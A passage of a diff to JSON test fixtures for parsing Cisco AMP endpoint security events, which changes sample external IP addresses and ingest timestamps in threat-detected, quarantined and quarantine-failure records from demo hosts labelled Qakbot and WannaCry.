Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.E4FCCBFA69-95.SBX.TG\",\"detection_id\":\"6412680266518626317\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Qakbot_3\",\"external_ip\":\"8.8.8.8\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"02:2f:e0:10:03:5d\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"28242311.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\Users\\\\johndoe\\\\AppData\\\\Local\\\\Temp\\\\28242311.exe\",\"identity\":{\"sha256\":\"e4fccbfa69222c71130a307956df1dd3013ecb1b523e145fab7abf1602330014\"},\"parent\":{\"process_id\":4788,\"disposition\":\"Malicious\",\"file_name\":\"28242311.exe\",\"identity\":{\"sha256\":\"e4fccbfa69222c71130a307956df1dd3013ecb1b523e145fab7abf1602330014\"}}}}}",
+ "ingested": "2021-12-09T13:35:39.763804100Z",
+ "original": 
"{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6412680266518626000,\"timestamp\":1610655485,\"timestamp_nanoseconds\":494000000,\"date\":\"2021-01-14T20:18:05+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.E4FCCBFA69-95.SBX.TG\",\"detection_id\":\"6412680266518626317\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Qakbot_3\",\"external_ip\":\"81.2.69.144\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"02:2f:e0:10:03:5d\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"28242311.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\Users\\\\johndoe\\\\AppData\\\\Local\\\\Temp\\\\28242311.exe\",\"identity\":{\"sha256\":\"e4fccbfa69222c71130a307956df1dd3013ecb1b523e145fab7abf1602330014\"},\"parent\":{\"process_id\":4788,\"disposition\":\"Malicious\",\"file_name\":\"28242311.exe\",\"identity\":{\"sha256\":\"e4fccbfa69222c71130a307956df1dd3013ecb1b523e145fab7abf1602330014\"}}}}}", "code": "1090519054", "kind": "alert", "action": "Threat Detected", @@ -577,7 +577,7 @@ } ], "connector_guid": "test_connector_guid", - "external_ip": "8.8.8.8" + "external_ip": "81.2.69.144" }, "file": { "parent": { @@ -631,7 +631,7 @@ "f504774b72acfb23a46217aec9c6559fd7e4df64" ], "ip": [ - "8.8.8.8", + "81.2.69.144", "10.10.10.10" ] }, 
@@ -648,8 +648,8 @@
 },
 "event": {
 "severity": 2,
- "ingested": "2021-09-30T00:14:44.025220104Z",
- "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6412680266518626000,\"timestamp\":1610655485,\"timestamp_nanoseconds\":478000000,\"date\":\"2021-01-14T20:18:05+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.E4FCCBFA69-95.SBX.TG\",\"detection_id\":\"6412680266518626316\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Qakbot_3\",\"external_ip\":\"8.8.8.8\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"02:2f:e0:10:03:5d\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"28242311.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\Users\\\\johndoe\\\\AppData\\\\Local\\\\Temp\\\\28242311.exe\",\"identity\":{\"sha256\":\"e4fccbfa69222c71130a307956df1dd3013ecb1b523e145fab7abf1602330014\",\"sha1\":\"f504774b72acfb23a46217aec9c6559fd7e4df64\",\"md5\":\"b5ede95ec8bc4ad6984758be42b152bd\"}}}}",
+ "ingested": "2021-12-09T13:35:39.763807800Z",
+ "original": 
"{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6412680266518626000,\"timestamp\":1610655485,\"timestamp_nanoseconds\":478000000,\"date\":\"2021-01-14T20:18:05+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.E4FCCBFA69-95.SBX.TG\",\"detection_id\":\"6412680266518626316\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Qakbot_3\",\"external_ip\":\"81.2.69.144\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"02:2f:e0:10:03:5d\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"28242311.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\Users\\\\johndoe\\\\AppData\\\\Local\\\\Temp\\\\28242311.exe\",\"identity\":{\"sha256\":\"e4fccbfa69222c71130a307956df1dd3013ecb1b523e145fab7abf1602330014\",\"sha1\":\"f504774b72acfb23a46217aec9c6559fd7e4df64\",\"md5\":\"b5ede95ec8bc4ad6984758be42b152bd\"}}}}", "code": "1090519054", "kind": "alert", "action": "Threat Detected", @@ -671,7 +671,7 @@ } ], "connector_guid": "test_connector_guid", - "external_ip": "8.8.8.8" + "external_ip": "81.2.69.144" }, "file": { "disposition": "Malicious", @@ -712,7 +712,7 @@ "e4fccbfa69222c71130a307956df1dd3013ecb1b523e145fab7abf1602330014" ], "ip": [ - "8.8.8.8", + "81.2.69.144", "10.10.10.10" ] }, 
@@ -722,8 +722,8 @@
 },
 "event": {
 "severity": 2,
- "ingested": "2021-09-30T00:14:44.025222302Z",
- "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6412680266518626000,\"timestamp\":1610655485,\"timestamp_nanoseconds\":587000000,\"date\":\"2021-01-14T20:18:05+00:00\",\"event_type\":\"Threat Quarantined\",\"event_type_id\":553648143,\"detection_id\":\"6412680266518626318\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Qakbot_3\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"02:2f:e0:10:03:5d\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"e4fccbfa69222c71130a307956df1dd3013ecb1b523e145fab7abf1602330014\"}}}}",
+ "ingested": "2021-12-09T13:35:39.763812600Z",
+ "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6412680266518626000,\"timestamp\":1610655485,\"timestamp_nanoseconds\":587000000,\"date\":\"2021-01-14T20:18:05+00:00\",\"event_type\":\"Threat 
Quarantined\",\"event_type_id\":553648143,\"detection_id\":\"6412680266518626318\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Qakbot_3\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"02:2f:e0:10:03:5d\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"e4fccbfa69222c71130a307956df1dd3013ecb1b523e145fab7abf1602330014\"}}}}",
 "code": "553648143",
 "kind": "alert",
 "action": "Threat Quarantined",
@@ -743,7 +743,7 @@
 }
 ],
 "connector_guid": "test_connector_guid",
- "external_ip": "8.8.8.8"
+ "external_ip": "81.2.69.144"
 },
 "file": {
 "disposition": "Malicious",
@@ -784,7 +784,7 @@
 "e4fccbfa69222c71130a307956df1dd3013ecb1b523e145fab7abf1602330014"
 ],
 "ip": [
- "8.8.8.8",
+ "81.2.69.144",
 "10.10.10.10"
 ]
 },
@@ -794,8 +794,8 @@
 },
 "event": {
 "severity": 2,
- "ingested": "2021-09-30T00:14:44.025224554Z",
- "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6412680266518626000,\"timestamp\":1610655485,\"timestamp_nanoseconds\":494000000,\"date\":\"2021-01-14T20:18:05+00:00\",\"event_type\":\"Threat Quarantined\",\"event_type_id\":553648143,\"detection_id\":\"6412680266518626316\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Qakbot_3\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"02:2f:e0:10:03:5d\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"e4fccbfa69222c71130a307956df1dd3013ecb1b523e145fab7abf1602330014\"}}}}",
+ "ingested": "2021-12-09T13:35:39.763818700Z",
+ "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6412680266518626000,\"timestamp\":1610655485,\"timestamp_nanoseconds\":494000000,\"date\":\"2021-01-14T20:18:05+00:00\",\"event_type\":\"Threat 
Quarantined\",\"event_type_id\":553648143,\"detection_id\":\"6412680266518626316\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Qakbot_3\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"02:2f:e0:10:03:5d\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"e4fccbfa69222c71130a307956df1dd3013ecb1b523e145fab7abf1602330014\"}}}}",
 "code": "553648143",
 "kind": "alert",
 "action": "Threat Quarantined",
@@ -815,7 +815,7 @@
 }
 ],
 "connector_guid": "test_connector_guid",
- "external_ip": "8.8.8.8"
+ "external_ip": "81.2.69.144"
 },
 "file": {
 "disposition": "Malicious",
@@ -856,7 +856,7 @@
 "2ca2d550e603d74dedda03156023135b38da3630cb014e3d00b1263358c5f00d"
 ],
 "ip": [
- "8.8.8.8",
+ "81.2.69.144",
 "10.10.10.10"
 ]
 },
@@ -866,8 +866,8 @@
 },
 "event": {
 "severity": 2,
- "ingested": "2021-09-30T00:14:44.025226909Z",
- "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419303574240494000,\"timestamp\":1610652551,\"timestamp_nanoseconds\":664000000,\"date\":\"2021-01-14T19:29:11+00:00\",\"event_type\":\"Quarantine Failure\",\"event_type_id\":2164260880,\"detection_id\":\"6419303574240493599\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"error\":{\"error_code\":3221225524,\"description\":\"Object name not found\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"2ca2d550e603d74dedda03156023135b38da3630cb014e3d00b1263358c5f00d\"}}}}",
+ "ingested": "2021-12-09T13:35:39.763824800Z",
+ "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419303574240494000,\"timestamp\":1610652551,\"timestamp_nanoseconds\":664000000,\"date\":\"2021-01-14T19:29:11+00:00\",\"event_type\":\"Quarantine 
Failure\",\"event_type_id\":2164260880,\"detection_id\":\"6419303574240493599\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"error\":{\"error_code\":3221225524,\"description\":\"Object name not found\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"2ca2d550e603d74dedda03156023135b38da3630cb014e3d00b1263358c5f00d\"}}}}",
 "code": "2164260880",
 "kind": "alert",
 "action": "Quarantine Failure",
@@ -887,7 +887,7 @@
 }
 ],
 "connector_guid": "test_connector_guid",
- "external_ip": "8.8.8.8"
+ "external_ip": "81.2.69.144"
 },
 "file": {
 "disposition": "Malicious",
@@ -932,7 +932,7 @@
 "4a468603fdcb7a2eb5770705898cf9ef37aade532a7964642ecd705a74794b79"
 ],
 "ip": [
- "8.8.8.8",
+ "81.2.69.144",
 "10.10.10.10"
 ]
 },
@@ -942,8 +942,8 @@
 },
 "event": {
 "severity": 2,
- "ingested": "2021-09-30T00:14:44.025229372Z",
- "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419303574240494000,\"timestamp\":1610652551,\"timestamp_nanoseconds\":664000000,\"date\":\"2021-01-14T19:29:11+00:00\",\"event_type\":\"Quarantine Failure\",\"event_type_id\":2164260880,\"detection_id\":\"6419303574240493597\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"error\":{\"error_code\":3221225524,\"description\":\"Object name not found\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"4a468603fdcb7a2eb5770705898cf9ef37aade532a7964642ecd705a74794b79\"}}}}",
+ "ingested": "2021-12-09T13:35:39.763831200Z",
+ "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419303574240494000,\"timestamp\":1610652551,\"timestamp_nanoseconds\":664000000,\"date\":\"2021-01-14T19:29:11+00:00\",\"event_type\":\"Quarantine 
Failure\",\"event_type_id\":2164260880,\"detection_id\":\"6419303574240493597\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"error\":{\"error_code\":3221225524,\"description\":\"Object name not found\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"4a468603fdcb7a2eb5770705898cf9ef37aade532a7964642ecd705a74794b79\"}}}}",
 "code": "2164260880",
 "kind": "alert",
 "action": "Quarantine Failure",
@@ -963,7 +963,7 @@
 }
 ],
 "connector_guid": "test_connector_guid",
- "external_ip": "8.8.8.8"
+ "external_ip": "81.2.69.144"
 },
 "file": {
 "disposition": "Malicious",
@@ -1008,7 +1008,7 @@
 "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"
 ],
 "ip": [
- "8.8.8.8",
+ "81.2.69.144",
 "10.10.10.10"
 ]
 },
@@ -1018,8 +1018,8 @@
 },
 "event": {
 "severity": 2,
- "ingested": "2021-09-30T00:14:44.025231667Z",
- "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419303574240494000,\"timestamp\":1610652551,\"timestamp_nanoseconds\":664000000,\"date\":\"2021-01-14T19:29:11+00:00\",\"event_type\":\"Quarantine Failure\",\"event_type_id\":2164260880,\"detection_id\":\"6419303569945526295\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"error\":{\"error_code\":3221225558,\"description\":\"Delete pending\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}",
+ "ingested": "2021-12-09T13:35:39.763837500Z",
+ "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419303574240494000,\"timestamp\":1610652551,\"timestamp_nanoseconds\":664000000,\"date\":\"2021-01-14T19:29:11+00:00\",\"event_type\":\"Quarantine 
Failure\",\"event_type_id\":2164260880,\"detection_id\":\"6419303569945526295\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"error\":{\"error_code\":3221225558,\"description\":\"Delete pending\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}",
 "code": "2164260880",
 "kind": "alert",
 "action": "Quarantine Failure",
@@ -1039,7 +1039,7 @@
 }
 ],
 "connector_guid": "test_connector_guid",
- "external_ip": "8.8.8.8"
+ "external_ip": "81.2.69.144"
 },
 "file": {
 "disposition": "Malicious",
@@ -1084,7 +1084,7 @@
 "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"
 ],
 "ip": [
- "8.8.8.8",
+ "81.2.69.144",
 "10.10.10.10"
 ]
 },
@@ -1094,8 +1094,8 @@
 },
 "event": {
 "severity": 2,
- "ingested": "2021-09-30T00:14:44.025233899Z",
- "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419303574240494000,\"timestamp\":1610652551,\"timestamp_nanoseconds\":664000000,\"date\":\"2021-01-14T19:29:11+00:00\",\"event_type\":\"Quarantine Failure\",\"event_type_id\":2164260880,\"detection_id\":\"6419303569945526294\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"error\":{\"error_code\":3221225558,\"description\":\"Delete pending\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}",
+ "ingested": "2021-12-09T13:35:39.763843500Z",
+ "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419303574240494000,\"timestamp\":1610652551,\"timestamp_nanoseconds\":664000000,\"date\":\"2021-01-14T19:29:11+00:00\",\"event_type\":\"Quarantine 
Failure\",\"event_type_id\":2164260880,\"detection_id\":\"6419303569945526294\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"error\":{\"error_code\":3221225558,\"description\":\"Delete pending\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}",
 "code": "2164260880",
 "kind": "alert",
 "action": "Quarantine Failure",
@@ -1115,7 +1115,7 @@
 }
 ],
 "connector_guid": "test_connector_guid",
- "external_ip": "8.8.8.8"
+ "external_ip": "81.2.69.144"
 },
 "file": {
 "disposition": "Malicious",
@@ -1160,7 +1160,7 @@
 "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"
 ],
 "ip": [
- "8.8.8.8",
+ "81.2.69.144",
 "10.10.10.10"
 ]
 },
@@ -1170,8 +1170,8 @@
 },
 "event": {
 "severity": 2,
- "ingested": "2021-09-30T00:14:44.025236153Z",
- "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419303574240494000,\"timestamp\":1610652551,\"timestamp_nanoseconds\":664000000,\"date\":\"2021-01-14T19:29:11+00:00\",\"event_type\":\"Quarantine Failure\",\"event_type_id\":2164260880,\"detection_id\":\"6419303569945526293\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"error\":{\"error_code\":3221225558,\"description\":\"Delete 